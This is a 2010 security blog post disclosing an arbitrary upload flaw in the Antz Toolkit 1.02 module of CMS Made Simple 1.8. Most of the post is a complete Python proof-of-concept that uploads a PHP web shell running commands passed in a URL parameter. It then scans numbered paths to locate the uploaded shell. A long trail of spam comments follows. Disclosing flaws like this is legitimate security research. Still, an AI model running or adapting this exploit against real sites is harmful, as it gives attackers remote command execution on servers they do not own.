This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

CMS Made Simple 1.8 Antz Toolkit 1.02 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Antz Toolkit 1.02 Module can be exploited to upload a PHP shell.

PoC
import socket

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 257\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="antzSeed"\r\n'
'\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')

resp = s.recv(8192)

s.close()

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

print 'searching or shell'

for i in range(0, 9999):

shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok in s.recv(8192)[:len(http_ok)]:
print '\r\nshell located at http://' + host + shell_path
break
else:
print '.',

upload_shell()

27 comments:

  1. Argos Discount Codes

    eiendom marbellaI hope it's true. That's good for all. You are lovely.good night.
    Yes. This information is useful for me. It useful ... Wish you a nice day.

    ReplyDelete
  2. κατασκευή ιστοσελίδας

    strategyWe really love your blog, i haven't seen you keeping the posts in in some time now. Is everything ok.
    I'd love to visit that random middle-of-nowhere pub!
    How great is the scenery, all nice and green.

    ReplyDelete
  3. surge suppressors

    Small Business Web DesignThere are, of course, theories using these features to describe their evolution. The incisors could, in fact, be analogous features shared between the bandicoot and the Dasyuromorphia order. They share the same function, after all, and though they are structurally similar the incisors of the carnivorous marsupials are a lot sharper than the flatter versions in the Bandicoot

    ReplyDelete
  4. regulatory consultants

    ISO 9001 2008Oh? This is new to me. I do not know about it. You did very well. Wish you a nice day.
    Uhm. You say true. I think so. Wish you good luck.good night.

    ReplyDelete
  5. Coursework writing

    NitrocelluloseOh my god I absolutely love your blog!!
    I read every post immediately and I have to say I like every one of them!!
    It would be really cool if you commented on my Facebook, and post a little bio about yourself, I think my readers would be really interested and I want to spread the word about you. here is my facebook fan page link:
    http://www.facebook.com/pages/Fashion-Forestry/161175173899354

    ReplyDelete
  6. promo counters

    finger food catering brisbaneThe most important benefit of online shopping is that it allows people to browse through a number of products and categories and offer them facilities to compare the prices of products they have chosen

    ReplyDelete
  7. replicas de relogios

    estetica y belleza las rozasThe incisors could, in fact, be analogous features shared between the bandicoot and the Dasyuromorphia order. They share the same function, after all, and though they are structurally similar the incisors of the carnivorous marsupials are a lot sharper than the flatter versions in the Bandicoot.

    ReplyDelete
  8. being nice, easily portable and unstable. Brand names prefer Northern Skin, Patagonia, Marmot, High altitude Appliance along with REI pretty much all utilize all the way down in a number of in their tornados apparel tas branded tas branded

    ReplyDelete
  9. applications with pelt, higher senses-all this elements which usually family pets take advantage of to thrive as the name indicated. On the plus side for individuals, we could furthermore shrewd. In which quality sarang burung walet bahan bangunan

    ReplyDelete
  10. Fort Collins Chiropractor

    braces dublin
    We really love your blog, i haven't seen you keeping the posts in in some time now. Is everything ok.
    I'd love to visit that random middle-of-nowhere pub!
    How great is the scenery, all nice and green.

    ReplyDelete
  11. Car Games

    personal injury attorney portlandOh my god I absolutely love your blog!!
    I read every post immediately and I have to say I like every one of them!!

    ReplyDelete
  12. braces dublin

    relogios replicas
    I hope it's true. That's good for all. You are lovely.good night.
    Yes. This information is useful for me. It useful ... Wish you a nice day.

    ReplyDelete
  13. A gamete's chromosomes are not exact duplicates of either of the sets of chromosomes carried in the somatic cells of the individual that produced the gametes. They can be hybrids produced through crossover (a form of genetic recombination) of chromosomes, which takes place in meiosis.
    Florist Melbourne Australia

    Car Warranty

    ReplyDelete
  14. The classification of protozoa has been and remains a problematic area of taxonomy. Where they are available DNA sequences are used as the basis for classification but for the majority of described protozoa such material is not available. They have been and still are mostly on the basis of the their morphology and for the parasitic species their hosts.
    الرياضة المصرية

    Descargar Series

    ReplyDelete
  15. This comment has been removed by the author.

    ReplyDelete
  16. The rotor transports protons across the membrane, and is turned in the process. The rotor alone can operate at 6,000 to 17,000 rpm, but with the flagellar filament attached usually only reaches 200 to 1000 rpm. The direction of rotation can be switched almost instantaneously, caused by a slight change in the position of a protein, FliG, in the rotor.
    water ionizer

    Hand Sanitizer Stations and Refill

    ReplyDelete
  17. There are some interesting points in time in this article but I don’t know if I see all of them center to heart. There is some validity but I will take hold opinion until I look into it further. Good article , thanks and we want more! Added to FeedBurner as well

    ReplyDelete
  18. Your blog is very useful for me,Thanks for your sharing.

    ดูหนัง

    ReplyDelete
  19. pgสล็อต สล็อตออนไลน์ เว็บตรง แตกง่าย จุดเริ่มของพวกเรานั้นพวกเราก็จำเป็นต้องขอย้อนไปในช่วงเวลาที่พวกเรานั้นยังปฏิบัติงานประจำอยู่เลย pg slot ช่วยให้ท่านได้สนุกไปกับเรา

    ReplyDelete